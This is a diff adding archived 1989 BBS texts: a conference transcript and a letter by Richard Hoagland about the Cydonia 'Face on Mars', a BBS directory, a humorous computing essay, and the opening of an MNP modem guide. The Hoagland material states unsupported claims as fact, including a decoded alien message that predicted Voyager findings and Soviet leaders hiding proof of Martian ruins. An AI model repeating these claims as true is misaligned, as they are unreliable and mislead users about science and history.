+(Stan Tenen) im still curious about 360 degrees and base 3 as far as I can se +e +360 base10 = 111100 base3 is this correct?ga + +(Ted) This seems to be a rather involve question to answer in this format. St +an, +earlier Dick gave an address where he can be reached. Could this question be +dealt with in that way? ga + +(Stan Tenen) yes + +(EROL TORUN) ? + +(Dick H.) perhaps I can answer Stan, without boring everyone else I come back +to +"how will we know it's real." That is THE question everyone would agree (I +hope!) I also feel that something said earlier this evening is right on track +: +we tend to get mesmerized by the images -- what "looks" familiar -- a "Face," +etc. And we lose sight of the science -- the epistemology -- that must under +pin +any "decision" on "reality." I believe, in answer to another question, that w +e +may have "crossed the Rubicon" on this one. The math is the key. How many "bi +g" +questions in science are decided by things we CANNOT see -- quarks black-hole +models .. AIDS viruses? If we have to recognize something in these images, +before we accept the "reality" of this, then we're rejecting at least two +hundred years of science! So, we come back to the numbers. Erol discovered a +specific set of numbers in one object, after trying to DISPROVE my contention +that this object was important. I extended those specific numbers to the whol +e +Complex and found THE SAME quantities, expressed repeatedly to ONE PART IN A +THOUSAND!!! The probability that these serial discoveries are chance is +calculable by the same mathematics used to calculate the odds of TWO engines +failing on a 737 in England and the results say we are NOT dealing with chanc +e: +it HAS to be Design to we believe the numbers . . .? Read the papers on the +Mars BBS -- (703) 228-7822 -- in a week or so. ga + +(Ted) Erol Torun is up. Go Ahead Erol GA + +(EROL TORUN) Am I getting through to you? + +(Ted) Yes. Just a reminder to those new to our CO. We operate under formal +rules. If you want to ask a question or make a comment type a "?" or a "!" a +nd +I will take down your name and put you in queue. I'll let you know when it is +your turn. GA Erol ( GA means Go Ahead and talk) GA + +(EROL TORUN) Great conference, dick. I agree with Dick's opinion that the fin +al +test of the reality of what we are looking at will be based on the presence o +f +regular geometry. To briefly summarize my work, I have found the three things +that one would look for in ANY remotely sensed imagery that might contain rui +ns +these are : + + 1 - Inconsistency with the local geology .. + 2 - The presence of regular geometry that is suggestive + of intelligent intervention + 3 - Meaningful context + + Dick was the first to emphasize the importance of context i.e. a face or +pyramid in isolation would make little sense GA + +(steve rivera) ? + +(Dick H.) Sorry, I missed a bit when something knocked me off line.ga + +(Stan Tenen) bye and be well all + +(Ted) Don is up GA + +(DON) Thanks Ted. Richard, Mars is all well and good, and it is possible that +something has in fact occurred there. Until such time as more photos are tak +en, +or a manned mission happens, we will not know. My question is this. Since th +e +first manned flights in the 60's, there have been many reports by our astrona +uts +of sightings of UFOs while in orbit, or while on the moon. Also, many +unexplained sightings of something on the moon have filtered back. In the mid +70's George Leonard wrote an excellent book titled "Somebody Else is on the +Moon". Have you read this. Or are you familiar with this as well as other wo +rks +about unusual occurrences that have been reported on the Moon? What is your +opinion that even know, something could be occurring? ga + +(Dick H.) First thing's first. My point (and Erol's) is simply this: we now +have enough repeatable, numerical data, to be able to make a very high +probability statement regarding the "reality" or "non-reality" of the Cydonia +Complex -- if we use the SAME RULES we routinely apply to other areas of +science. To most people, I realize, they'll have to "see" something they +recognize; but that's not "science," that's emotional response. So, let's ke +ep +in mind the work that we have covered + +(Ted) Dick, are you there? ga + +(DON) Ted, he got bumped. + +(Ted) Dick got dumped. Welcome back Dick. + +(Dick H.) Sorry, Don. Now, to the last part of your question + +[Don left the conference at this point] + +(Ted) Bert is next GA BERT + +(Dick H.) Oh + +(Bert) Go ahead and finish your thought Dick.ga + +(Ted) Ga Dick + +(Dick H.) I was going to answer Don's question...But. since he's left, let's +move on.ga + +(Ted) GA BERT +(Bert) With regard to the AP article mentioning that the Soviets had seen +something like a "15 mile strip" and a "spindle" shaped formation, have you o +r +any of your group attempted to contact them about what this might have been? +ga + +(Dick H.) Let's take a few interesting things in order. The Soviets have "kno +wn" +about these objects since AT LEAST 1984 -- when they published a provocative +piece in Soviet Life Mag titled" "Pyramids on Mars?" Now, O'Leary took them +the +enhanced photos in Jan, '88. They had at least a year and a half to plan how +to +take new images. Now, we have strange stories coming out of Radio Moscow +Stories of "strange, spindle-shaped objects and linear features that seem +rectilinear". If you put all of this together, you just MIGHT come up with th +e +idea that they have indeed taken some new images . . . and they are "leaking" +news to the West -just like they've done before. Look at the details of the +"spindle story": They claim it could be the "shadow of a spacecraft on the +surface". If their resolution is THAT good (do the calculation) then they hav +e +to have seen something interesting at Cydonia! ga + +(mcorbin) ! + +(Ted) Mike C is up GA Mike + +(mcorbin) I have three small questions/statements to make. First, does the US +have any frames of the areas that have been taken by the Soviets? Also, I wo +uld +to offer ParaNet's assistance to you in the efforts of getting information to +the public. We are prepared to be of service to you in any way that we possi +bly +can. And, finally, how near to the complex is this area that the Soviets are +interested in? + +(Dick H.) To your first question, yes the Soviets have brought some Phobos +images to Washington NASA HQ but I haven't seen them. They did show O'Leary s +ome +Phobos (the moon) photos in Tokyo. And he brought those back to Phoenix. We +were discussing them on the phone the other afternoon when he called trying t +o +get an idea of the resolution of the cameras (Something like the physicists +who've been trying to duplicate the cold fusion lab set-ups from wire photos! +) +Anyway, we don't know (because they haven't released coordinates) where the +Soviet "spindle" is located. So, does that answer your question?.ga + +(EROL TORUN) ? + +(Ted) GA Erol + +(mcorbin) Yes, one thing more on this. What is the resolution on the Soviet's +camera. Do you know? + +(Dick H.) For obvious reasons, we've been trying to get very specific info on +this. But it's been hard. We've tried published specs. We've tried "inside +sources" who are working with the Soviets (like Merton Davies, at RAND) and, +we've tried to estimate it, based on the photos they gave O'Leary last week. +It +all says that IF they wanted to really take new images of Cydonia they could +probably AT LEAST equal Viking and, if they put the spacecraft in an orbit +designed to get new pics specifically they could do better than Viking by may +be +a factor of 2 or 3 But we don't know!!!ga + +(EROL TORUN) ? + +(Ted) ga EROL + +(EROL TORUN) Dick, was the AP story more specific as to what the Soviets mean +t +by a "spindle shaped object" ? I'm thinking of the Viking photograph in +Monuments that shows a bizarre "bow-tie" shaped object in close proximity to +a +straight line with an East-West orientation perhaps the Soviets have reimaged +these objects GA + +(Dick H.) Shades of the Runway. I simply don't know, Erol. However, all our +speculating is not going to get real data. What we have done -- and you were +in +the meeting in Roe's office when he asked -- is to submit a specific "wish li +st" +to the Chairman of items that will move this Investigation along. And a DIRE +CT +CALL to the Soviets, asking to see any images they DID secure of Cydonia, is +on +that list and will be in the LIB 10, t'morrow, right Ted? ga + +(Ted) Should be there if all goes well. Any other ? GA + +(Ted) Ok, I want to thank Richard Hoagland for a VERY interesting and +informative evening. I hope that Dick will be back to join us soon (and +hopefully will be in the National Issues Forum) to join our discussions. Than +k +you Dick. GA + +(mcorbin) Thank you Dick. + +(Dick H.) I'd like to thank everyone who turned out, Ted, it's been a real +experience. Never had to type so fast in MY LIFE!ga + +(Bert) Many thanks Dick, also thanks to Erol. + +(Mark.Y) Thank you for typing with us! Much appreciated! + +(Mike) Ditto + +(EROL TORUN) Thanks and good night to all + +(mcorbin) Thanks Erol. + +(Ted) Yes, thanks to EROL also. Let you fingers do the walking thru the data +bases! Nite all! ga + +(mcorbin) Night Ted. Night Bert. + +(Mark.Y) Night, all! + +(EROL TORUN) ditto + +(Bert) Night all. + +(Mike) "Nite + +(Dick H.) Why does this sound (look?) like the Waltons? G'night one and all.g +a + + + + + +Press ! + + \ No newline at end of file diff --git a/textfiles.com/computers/hoagland.let b/textfiles.com/computers/hoagland.let new file mode 100644 index 00000000..fb5d3c8a --- /dev/null +++ b/textfiles.com/computers/hoagland.let @@ -0,0 +1,556 @@ +====================================================================== + + FILE ORIGINATES FROM: <> + UPLOADED BY: Tom Mickus + DATE OF UPLOAD: DEC/27/1989 + +====================================================================== +====================================================================== + + HOAGLAND.LET [ ***] Marsface author writes Pravda -DEC/89 + +====================================================================== +====================================================================== + + NOTE: The file is reproduced verbatim, except for use of "(sic)". + Words fully capitalized represent use of boldface in letter. + Accompanying "attachments" referred to in the following + letter, are not reproduced here. + +======================================================================= +======================================================================= + + + Richard C. Hoagland + + + Old Gate Farm + Rt 4 Box 168 + Wytheville, VA 24382 + (703) 228-5524 + + December 1, 1989 + + + Olga Dmitrieva + % Komsomolskaya Pravda + Street 24 + 6th Floor + Moscow, USSR + + + Dear Olga, + + It was great to talk with you again the other morning (even + though th only time I could finally get a circuit between the United + States and Moscow was about 4:30 _AM_ -- when my body kept insisting + it was still "night!"). From the sound of your voice and our brief + conversation, including our exchange last Spring at Peggy Carters', + I know if we lived closer -- at least on the same continent -- we'd + have many things to talk about -- especially now, in view of what is + taking place around the world. + + Attached is my "Op-Ed piece" on our Mars Investigation -- and + what I now believe is the "fingerprint" of its dramatic, real-world + impact on the current history taking place before our eyes. I look + forward eagerly to your reaction. + + I've thought a lot about what you were trying to describe that + night so many months ago, when you were telling us about the new, + important role for journalism in your country; it reminded me of the + feelings trhat I had, when I got my first major journalistic opportun- + ity "to make a difference." At the somewhat "tender" age of twenty- + three, I was suddenly, "miraculously," invited to join CBS News about + twenty years ago (see attached biographical sketch) -- "to help them + go to the Moon." [The actual invitation was to become a science adv- + isor, during the Apollo lunar missions, to Walter Cronkite (can you + believe?). At the time, Walter was known as "the most trusted man in + America," and indication of the esteem in which he was held, both by + the public and his journalistic colleagues]. + + The almost indescribable feelings that I had on that remarkable + occasion -- when I realized that my (at the time, _very_ meager!) sci- + ence journalistic skills were actually being sought by an almost legen- + dary world news organization, if not by its very dean of journalism (!), + to contribute even in a tiny way towards an unprecedented moment in the + history of all Humanity, the First Lunar Landing -- I've thought, many + times since our first meeting, must have been very similar to the + feelings you attempted to describe that night in North Carolina, in- + volving your own role these days in Moscow: being witness to -- if not + an active participant in -- History. + + If I remember correctly, you said something like "we [journalists] + now feel like soldiers 'on the front lines.' We feel a great, almost + historic responsibility to may 'peristroyka' work!" + + Because of the historic "moment" you are now experiencing, Olga + -- participating in the extraordinary rebirth of an entire nation, + literally grappling with the Future (as opposed to "just" reporting it) + -- I believe that you can share some of my own vicarious excitement, + as I watch from half-way around the world, and wonder. . . is it + _possible_ that, behind ALL the extraordinary, revolutionary changes + we are seeing. . . what we have discovered on the Viking photographs + is partially responsible. . . ?! + + ANCIENT RUINS LYING ON A NEARBY PLANET, RUINS WHICH WILL CHANGE + THE COURSE OF HISTORY FOR EACH OF US. . . IF THEY AREN'T DOING SO + ALREADY? + + When we first discussed the possibility of my writing something + for you regarding our research, I certainly could not have stated these + ideas with such apparent certainty. But, over the course of the summer, + several major breakthroughs have occurred -- on both the scientific + front, and on the "politics of verification." These have remarkably + verified our "intelligence hypothesis," and crystallized my thoughts + -- and the result is the "editorial" you have before you. + + The dramatic political developments -- which have included a + _total_reversal_ of "policy" with regard to the "Cydonia artifacts" + by NASA, and in less that 6 months (correspondence attached to this + letter) -- occurred, after 13 years of dismissing the possibility as + "nonsense," almost as rapidly as the revolutionary changes your + government is now undergoing after 70 years, prompting me to ask: + what's really going on here? + + In particular, when you and I first met, I had just returned + from Washington (April 19), and a face-to-face meeting with Congress- + man Robert A. Roe, head of the most powerful science committee in the + U.S. Congress. As you can see from the attached correspondence (just + follow the dates), after our meeting Roe asked me for a memo of re- + commendations. . . then he took a long time (over 6 months) doing + "something". . . followed by a sudden flurry of announcements to the + media and various constituents, affirming (directly opposite NASA's + previous "position") that "NASA does plan to take new images of the + 'Monuments of Mars'. . ." The very day the article in the WALL STREET + JOURNAL, announcing this development, appeared, was the _same_day_ + that Chairman Roe did an interview for radio (I have the tape) in + which he bluntly said, "I've seen the [Viking] pictures. . . and they + [the objects] don't appear natural. It would be stupid _not_ to look!" + + This from the Chairman of a major Congressional Committee in + the U.S. Government! + + As if this weren't enough, as I said, we also had a major + scientific breakthrough this summer in the Cydonia research: we + believe we've now actually _decoded_ the first part of a _mathematical_ + _message_ represented by the exquisite, redundant geometry we had + previously discovered at Cydonia. How do we know? Because the + mathematics _predict_ certain geophysical events, at _specific_ + latitudes on other planets in the solar system, and the Sun. . . and + when we look at the geodetic maps of these celestial bodies -- the + phenomena are there! + + As I said many times in MONUMENTS: "Science is nothing, if it's + not prediction." + + In mid-August we published a technical paper on these dramatic + findings -- including a series of _very_specific_ geophysical pre- + dictions regarding what our Voyager unmanned spacecraft would find at + Neptune (_before_ it got to Neptune!). Because of the short lead-time, + we published electronically in a world-wide computer-information system + called "Compuserv" (the managers of Compuserv have specifically told + me, incidentally, that they will give you _free_access_ from Moscow, if + you want to communicate "live" with our on-going Mars Mission Issues + conversation, where we are actively discussing the major issues that I + raise in my "guest editorial." Or, you can simply access a vast range + of information. We can discuss details of that fascinating possibility + later, if you're interested). + + Anyway, two weeks after we had published our "message paper," + Voyager flew by Neptune. . . and observed _exactly_ what our "Cydonia + equations" had predicted -- based on a set of mathematical geophysical + principles discovered where there should be nothing capable of giving + any valid predictions for events taking place on a planet in the distant + outer solar system! + + The only logical conclusion you can come to from these data, is + that we indeed have successfully decoded a specific "message" intended + by someone -- whomever "built" Cydonia -- to lead whomever would + discover "the Cydonia artifacts" to these _specific_geophysical_ + _phenomena_. Why? Because they are clues to how planets really "work" + -- including our own Earth. And finding that out is essential to + _preserving_ any planet, if not possibly much more (we're working on + additional possibilities right now). + + So you put these remarkable developments together, and you wind + up asking: "Are we the _only_ smart guys on this planet, to have + finally figured it out -- if only the beginning?! + + And the answer is: "Of course not." + + Your next question might be: "If these facts were also known + to members of the Government, particularly, since one key member -- + a Chairman of a major Congressional Committee -- has now publicly + admitted "they _don't_ appear natural. . .") -- HOW WOULD THE GOV- + ERNMENT BE ACTING?" + + And, if you had, in fact (as I report in the editorial), + briefed high-level members of both governments -- the U.S. and the + U.S.S.R. -- and one of them subsequently had a brilliantly-equipped, + working spacecraft actually in orbit around Mars for several months + . . . before it mysteriously "quit," your next logical question would + _have_to_be_: + + DID THAT SPACECRAFT ACTUALLY _FIND_ SOMETHING. . . SOMETHING + WHICH COMPLETELY VERIFIES OUR VIKING INFORMATION, IF NOT RADICALLY + _EXTENDS_ IT. . . ? + + But then you'd have to ask: "If that were true, if Mr. Gorbachev + is truly holding absolute proof (from Phobos 2) of the most phenomenal + discovery in history -- HOW WOULD HE BE ACTING? + + My conclusions -- if not some of the significant evidence which + has led to these conclusions (the computer-enhanced Viking photographs, + along with my official documents and letters) -- you now have before + you my "editorial." + + * * * + + Olga, after a lot of soul-searching and weighing of our evidence, + I think the confirmation that the Human Race Is Not Alone -- as Mr. + Reagan _repeatedly_ has provided us the clues (see "editorial") -- is + the _only_ thing "big enough" to have suddenly , almost overnight, + forced the radical events we have been witnessing. And I think pro- + viding the crucial, hard evidence of that New Reality, to a series of + major leaders at the top of key governments (including now, the Pope!) + -- both within and without the so-called "Communist world" -- is the + reason Mr. Gorbachev remains so confident that the major "restructuring" + he's planning for your country -- if not the world -- is actually going + to succeed. + + Because, if I am right, this discovery represents an extra- + ordinary New Beginning for Humanity. And Mr. Gorbachev, more now than + any other leader (since Ronald Reagan's Presidency ended), seems to + realize the power of that concept for creating needed Change. Just + compare television images of him and Mr. Bush. . . + + Olga, I know this sounds bizarre. It would have appeared that + way to me, if anyone had seriously proposed this even a few months ago. + But the Mars data is inviolable, and the terrestrial clues are there -- + including a series of truly curious events I _didn't_ detail in the + editorial, for simple lack of space. These events include: + + * * * + + A September meeting, against the backdrop of developments + sweeping out of Moscow and across all Eastern Europe, between ex-CIA + and ex-KGB agents, held in the United States -- ostensibly, to discuss + "possible interagency cooperation on international terrorism." One + key participant -- Mr. William Colby, former Director of the CIA -- + as he was being interviewed on the ABC network program, NIGHTLINE, + along with Lt. General Fjodor Sherbak, former First Deputy Director + of the KGB, suddenly introduced into the conversation (for a total of + _five_ occasions in the last four years) former President Reagan's + curious scenario. Colby: + + "President Reagan said to Mr. Gorbachev one time, that if + hostile MARTIANS [sic] landed on the Earth, we would be together + against them. . . (emphasis added)." + + * * * + + In the context of what we have discovered on the Viking images, + and against Roe's own comments that "they don't appear natural," isn't + that just a little _too_ coincidental. . . ? What REALLY was occurring + at that meeting? And remember, Mr. Gorbachev used to be the equivalent + of Deputy Director of the KGB. . . + + Or, take the following, truly bizarre sequence of events: + + * * * + + Within days of this strange repetition of Reagan's curious + "alien threat" -- and from a former head of the U.S. intelligence + community no less -- came a bizarre, real-life "extraterrestrial + invasion story," appearing on the official TASS wires. The "report" + originated out of Voronezh, a city of about 800,000 people south of + Moscow. The correspondent, writing from Voronezh, seriously des- + cribed a "landing" in a city park by a "glowing alien vehicle"; a + "stroll around the park" by its giant humanoid inhabitants; and + even the temporary "disappearance" of one of the severely frightened + witnesses through the action of some kind of "ray of light," wielded + by the "aliens." The witnesses consisted of both children and adults, + reportedly including one high-ranking police official from the city, + Lt. Sergei A. Matveyev. + + In early October, President Gorbachev visited East Germany, + to celebrate the 40th Anniversary of the German Democratic Republic. + He then returned to Moscow, amid reports that Eric Honecker had + issued live ammunition and crackdown orders, against increasing + demonstrations for democracy across East Germany. + + Then, suddenly, the preceding official TASS report, on an + "alien invasion of a Soviet City," appeared on official Soviet + television, in the official Party newspaper, SOVIETSKAYA KULTURA, + and throughout the West -- including in THE NEW YORK TIMES, THE + WASHINGTON POST, and on our evening network television. . . + + THE SAME DAY -- OCTOBER 9 -- THAT ERIC HONECKER WAS SUDDENLY + REPLACED BY EGAN KRENZ, AS HEAD OF THE COMMUNIST PARTY OF THE GDR. + + Then, a few days after returning from his own quick trip to + Moscow, Egan Krenz, after instituing additional sweeping changes in + the entire GDR government and Party structure, announced dramatically + that the Berlin Wall "is obsolete" -- and three million East Germans + flocked to West Berlin across one deliriously happy weekend, as we + all watched in disbelief. . . + + Mr. Reagan's "human family," at least in Eastern Europe, was + taking shape with staggering rapidity and, eerily, precisely as Mr. + Reagan had himself, repeatedly, "predicted" -- this time, literally + against the backdrop of an officially-reported "alien invasion" of + the Soviet Union. . . + + What the hell was REALLY going on. . . a "public reminder" -- + to a new, unenthusiastic Bush Administration in the West, and to a + resisting Party structure in the GDR -- "to get with the Reagan- + Gorbachev program" . . . or else Gorbachev would prematurely reveal + the evidence (from Phobos 2) of REAL aliens (which is the _last_ thing + this American government wants)? + + Is that why Bush (and Baker) are so obviously _unenthusiastic_ + about the upcoming Malta meetings? Because now, it's clearly "Gorby's + game?" I (and a lot of other Western observers, who have remarked + about it repeatedly in all our media the past few weeks) have seen + men going to their own _hangings_ -- who've looked happier! + + * * * + + Olga, as hard as this evidence, and as fantastic as my inter- + pretation of the effects it is creating, might seem -- are the "real" + events any less fantastic? And do the "it's all driven by the des- + perate Soviet economics" explanations really "fit?" + + If it weren't for our now indisputable imaging and mathematical + evidence, and the repeated statements of a former President of the + United States (not to mention Chairman Roe's own statements and actions + on behalf of our findings), I would say "yes." But the contrary + evidence is there, and almost overwhelming; something of this magnitude + -- unprecedented in all human history, therefore, CALLING FOR AN UN- + PRECEDENTED HUMAN RESPONSE -- _must_ be behind the staggering events + that are occurring. It is the only thing which could be "bigger" than + "history as usual," creating a need for unprecedented actions. + + If this analysis is true, the _real_ facts and decisions that + are being made are being hidden from us. These _must_ be made public, + I believe -- and publicly debated. Otherwise -- as I end the editorial + -- "glasnost" and "self-determination" are merely hollow phrases, being + parroted by leaders who are _all_ treating us like children -- which + has been precisely the problem for too much of human history! + + I'll bet you didn't expect this, when you invited me to do a + piece for you on our research! But, ask yourself: if the Viking + evidence we have painstakingly assembled (some of which you now + possess) is truly what we think, what would we be seeing as its + effect upon the world -- given, that the leadership decided NOT to + tell us. . . yet. . . until we were somehow properly "prepared" to + handle it?! And what would that "preparation" look like? + + You now know what I believe. + + * * * + + As I was finishing the final draft of what I have submitted, + I realized that what we had originally discussed -- a presentation + of our "ET evidence," followed by a discussion of how it will affect + "the average Soviet citizen" -- was just not possible within a single + editorial; events have progressed too far and too rapidly: if this + hypothesis is accurate, both the "average Soviet citizen" and the + "average American citizen" are being deeply affected _at_this_very_ + _moment_, as are the "average citizens" of the GDR, Czechoslovakia, + Hungary, Poland, etc. -- if not the rest of humanity on Earth. These + effects are not going to occur in some hypothetical and distant + "future"; they are happening _right_now_ -- only , without the proper + background information, no one knows how to interpret these events. + Therefore, a good deal of the piece contains the crucial "background." + + But, Olga, I still feel that readers need a further amplif- + ication of the immense consequences flowing from this now rapidly- + advancing, unprecedented situation. + + For instance, that one extraordinary, almost immediate effect + -- with staggering, immediate consequences for everyone on Earth -- + has been the visible, rapid retreat of the likelihood of nuclear + annihilation. Even our Defense Secretary, Richard Cheny (sic), has + turned (in less than _two_weeks_,) from a vigilant "hawk," who was + then giving speeches arguing that we "could not rest our national + security on the future of one man, Mr. Gorbachev," into someone now + agressively promoting the need for about 180 billion dollars worth + of U.S. defense _cuts_ -- over the next three years -- regardless of + whether President Gorbachev is still around! Clearly, Cheny feels + there has been some kind of _fundamental_ change in the Soviet + Union. . . or in the larger situation embracing _both_ the super- + powers on this planet. + + The immediate4 _economic_ effect of this new attitude is + also making itself felt, not only in the United States but also in + your country: a so-called "peace-dividend," the monies that here- + tofore have been lavished on these huge, super-expensive arms- + stockpiles and high-tech weapons systems -- an almost uncountable + number of conventional weapons, nuclear warheads, intercontinental + missiles, planes, bombers, battleships, etc. -- is being rapidly + "earmarked" for diversion into "productive," peaceful industries; + I understand there are, even now, former rocket factories in the + U.S.S.R. which have already been "converted" -- and are, in part, + making bicycles! + + Olga, because of the necessity of providing proper background + to this whole extraordinary sequence of developments, I was only + able -- in a line! -- to touch upon this immediate economic "dividend" + of finding out the Human Race Is Not Alone. But there is more -- + _much_ more. + + So, here is my additional proposal: + + If you like what I have given you, and decide to run it, I + would like to expand upon the "effects" of these developments in a + "Part II." Since the economic impact of what is taking place is of + crucial importance to both of our respective cultures, the process + of "conversion" of 40 years of weapons industries to productive + output should be of major interest to your readers -- particularly, + if it is directly coupled (as it _will_ be) to the exploration of + what we've found on Mars. + + For years, we have been discussing in the United States -- + both inside and outside of NASA -- the potentially awesome terrestrial + economic effects of establishing "space industries" in orbit, to ex- + ploit the unique resources and enviroments of outer space. But with + massive weapons budgets and other constraints upon our federal budget, + there have been no "extra" monies to pay for such developments. Your + country, with its "MIR" space station and its various "materials + experiments" conducted during the long "stay-time" in zero-gravity by + cosmonauts in orbit, has developed far more experiences than we have + in exploring the kinds of materials that one can uniquely make in + orbit -- then send down to Earth. But even your space program has + been limited in applying this developing technology, by the massive + resources that have been going to the military, and by one other real + constraint -- the current, prohibitively expensive necessity of taking + _all_ materials, to be processed, into space from Earth. The costs + of lifting those resources _into_ space for processing, with present, + primitive rockets, is simply "killing." + + All that dramatically can change -- if we pursue its exploration + properly -- because of what we have discovered at Cydonia. + + What I would like to cover in "Part II" is the stunning + economic prospects for mining the _Martian_moons_ for these critical + resources, and the resulting industrial renaissance these abundant, + unique materials could stimulate on Earth -- with all the resulting + economic "fall-out" of new industries, new jobs, new markets, and new + consumer goods. Many economic studies, carried out both in the + United States and in the Soviet Union, indicate that with current + space technology (such as our space shuttle) IT IS CHEAPER TO GO TO + THE MARTIAN MOONS AND RETURN, THAN TO SEND MEN AND WOMEN OT THE + SURFACE OF OUR OWN MOON! (One of our own MARS MISSION associates, + Dr. Brian O'Leary, mentioned in the editorial, is an extensively + published pioneer in many of these studies.) + + The fact that the Soviet Phobos mission was directed at + intensive study of the composition of the _moons_ of Mars, before + its enigmatic "failure," is demonstration of the Soviet perception + of eventual economic importance of these objects. _If_ we have + indeed discovered a former extraterrestrial civilization once + resident within the Martian system, the political and social impetus + to exploring fully its potential -- if adequately publicized -- + could easily create an economic renaissance which could dramatically + affect the economies of both our countries -- particularly, if we + _jointly_ agree to explore the Martian "ruins," and similarly, to + _jointly_ develop the technologies to exploit the moons of Mars. + + The result could be a swift, almost painless, economic + transition -- for those major industries in both our countries + which currently employ millions of workers in the production of + weapons of destruction -- rockets, warheads, advanced electronic + avionics, and all the other high-tech gadgetry used in making war. + These same skills and technologies, employed through such a "Mars + conversion program," could usher in a literal New Age for everyone + on Earth. + + But of course, if I am right, the greatest benefit of all will + be in the dramatic new perspective that these discoveries will give + to every person living on this planet. There is almost a "spiritual + dimension" to discovering this truth -- that Humanity is NOT alone + before the Universe. This, I believe, is why those Orthodox Russian + priests were invited into the Phobos 2 Control Center. . . and why + Mr. Gorbachev met with Pope John-Paul this morning just prior to + his first face-to-face meeting with the current American President; + invoking the spiritual leaders on this planet in helping us to + "break the news" will be _essential_ to successful "preparation" + of the planet for the truth. + + Well, that's it for now. I eagerly look forward to hearing + from you regarding all of this. I know it's a LOT to take in all + at once. But, just look at your television screen this weekend. . . + Does any other explanation really fit? + + + Enjoy. . . + + + + P.S. I had another thought. If you agree that this should now + be publicly debated -- and in both our countries -- I would suggest + you might propose to the American television network news program, + NIGHTLINE, that they do a _joint_ program on this information with + your television program, in Moscow. You could contact Terry Irving, + the NIGHTLINE producer Ted Koppel assigned some months ago to + research our story; we've met with Irving in Washington at the ABC + News Bureau for several hours, now, and have provided him with all + the images and analyses -- including now a copy of my "editorial". + + +=============================== END OF FILE ================================= + + + +============================================================================= += Directory Listing of <> Computer Bulletin Board Systems = +============================================================================= + +----------------------------------------------------------------------------- +<> Board Name System Data Phone Baud +Net/Node Location Operator Remarks Hours +============================================================================= +<> THE CRUCIBLE Tom 416-237-1204 12/96 HST +(1:250/440) Toronto, ON Mickus Canadian Hub 24 Hrs +----------------------------------------------------------------------------- +<> Nexus Linda 602-526-8025 3/96 HST +(1:304/1) Flagstaff, AZ Murphy American Hub 24 Hrs +----------------------------------------------------------------------------- +<> LATTICE~ Rod 405-277-3603 3/96 HST +(1:147/66) Luther, OK Wilson 14.4 HST 24 Hrs +----------------------------------------------------------------------------- +<> Astro-Net David 714-662-2294 3/24 +(1:103/903) Costa Mesa, CA Rice 24 Hrs +----------------------------------------------------------------------------- +<> Radio Free Milwaukee Pete 414-351-1823 3/96 HST +(1:154/414) River Hills, WI Porro Multi-line 24 Hrs +----------------------------------------------------------------------------- +<> Studio PC Ralph 813-862-8850 3/96 +(1:377/2) Port Richey, FL LoBianco 24 Hrs +----------------------------------------------------------------------------- +<> The Briefcase BBS Mike 316-652-9202 3/24 +(1:291/3) Wichita, KS Holcomb 24 Hrs +----------------------------------------------------------------------------- +<> Adventures Unlimited Ray 303-493-8162 3/24 +(1:306/15) Ft. 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My loving wife had heard me talking about the computers I + work with and decided she would buy me my +very own. We were both excited about it on Christmas morning + when I unwrapped it and took it from the box. +Her excitement began to diminish after I had set it up and slowly + became familiar with it. The excitement +level hit bottom when she discovered that there was a lot more to + these things than just turning them on and +watching them go. Eventually I was able to build a nice computer + system starting with what she had bought me +and ending when I had all the peripherals and gadgets I needed. + She was careful when picking out a desk, to be +certain it would match the furniture in the living room, which was + where she had a nice spot picked out for me +to do my computing. A few years went by and she decided she + didn't want me in there anymore, so she moved my +desk into the guest bedroom. + + I wasn't quite as happy in the guest bedroom at first, + but soon I realized it was working out ok. If +I had some important computing to do, the television among other + things wouldn't bother me anymore. All I had +to do is just close the door. This bedroom was still a guest + bedroom complete with a full-sized bed to +accomodate her parents when they come to visit, so it was a + little crowded. After a while she began calling it +"your Computer Room". There was barely enough room to turn + around in there and my wishes to get a bookcase for +my computer manuals was out of the question. There just wasn't + room enough there for it. I offered to carry the +bed down to the basement and make a little room. She promptly + asked where her parents would sleep. My answer +swiftly earned me a knot on the head. + One day she approached me with some papers which she had +brought home form the office. They had all + kinds of fancy printing on them and she said it was done on their +computer at work. "Honey, can our computer + do this?", she asked. I was quick to say, "Of course it will." +She then began asking me about a few other + things such as graphics. She was quick to point out that the +computer at work was so easy to use. I tried to + explain that our computer wasn't hard to operate but as it turned +out, their's at work was set up to be fool + proof and would boot up and load the software by simply turning +on the switch. Well after I had convinced her + of our computer's capabilities, she asked me to start it up for +her and show her how to do it. Altough it + didn't start up as easy as the work computer, she realized that +she could do some of her work at home. Well, + it wasn't long before I was competing with her to use my own +computer. I decided it would be a good idea to + get her her own computer asd set it up to be as easy to operate +as the one at her office. Now, she was doing + some of her work at home, so this meant that she would need a +nice desk to work at. Well as mentioned before, + the room was a little crowded. +Because the room was so crowded, now I sit at my very own + computer, at my very own desk, in my very +own corner of the basement. It's a little cold down here, but I + guess that's good. I won't have to worry +about my computer overheating. So take it from me, if your wife + should ask you, "Can our computer do this?", +tell her anything but the truth. + + Happy Computing! diff --git a/textfiles.com/computers/how2mnp.txt b/textfiles.com/computers/how2mnp.txt new file mode 100644 index 00000000..bf84c796 --- /dev/null +++ b/textfiles.com/computers/how2mnp.txt @@ -0,0 +1,630 @@ +======= +PREFACE +======= + +If you are reading this, you probably have a modem. + +Your modem may be equipped with MNP error correction/compression protocols +(probably MNP 4 or 5 - will be explained soon). + +MNP can help you work faster. In addition to its error-free connection, it has +features that increase the effective modem speed beyond its rated value. + +If you do have MNP, chances are you are NOT using it correctly - you probably +do not communicate as fast as you can. In other words, you are probably paying +Bezeq more than you should. + +Using MNP correctly requires that you set various options in various locations +(your modem, your communication program and your file transfer protocols). +You must set ALL options correctly to make MNP work. Moreover, your +communicating partner (the BBS) must also set all ITS options correctly. The +defaults that come with your modem and your software do not help - they are +usually wrong. + +This article is intended to help you determine these settings so that you can +utilize your modem to its best. + +The basic idea is very simple. First, you must get your modem to work in its +highest speed (in other words, setup MNP correctly); then you must make sure +that your computer and software do not become a bottleneck and slow the modem +down. This simple idea is not very easy to implement, however, so read +carefully. + +One last remark. There are many brands of MNP modems in the market, and even +more communication programs and file transfer protocols. I cannot cover all +of them. The modem discussion will be based mainly on the Everex EV-941, +which I own and know the best. The software part will discuss Telix, Telemate, +Puma, Bimodem and DSZ. I will mention some other modems and software packages, +but your favorite one may not be among them. READ ANYHOW: if you understand +the basic ideas, you will probably be able to implement them for other +hardware or software items. + + +================= +SOME MODEM BASICS +================= + +So that we can all understand each other, let me draw some basic facts. They +are not necessarily exact, but they are good enough for this discussion. If +you are familiar with these facts, you can skip this and the following +section. + +Let's assume that YOUR computer wants to send some data to MY computer. Here +is what happens: + +Your computer sends the data to its own "Serial Adapter" (or "RS232 card"). +It sends the data in parallel - 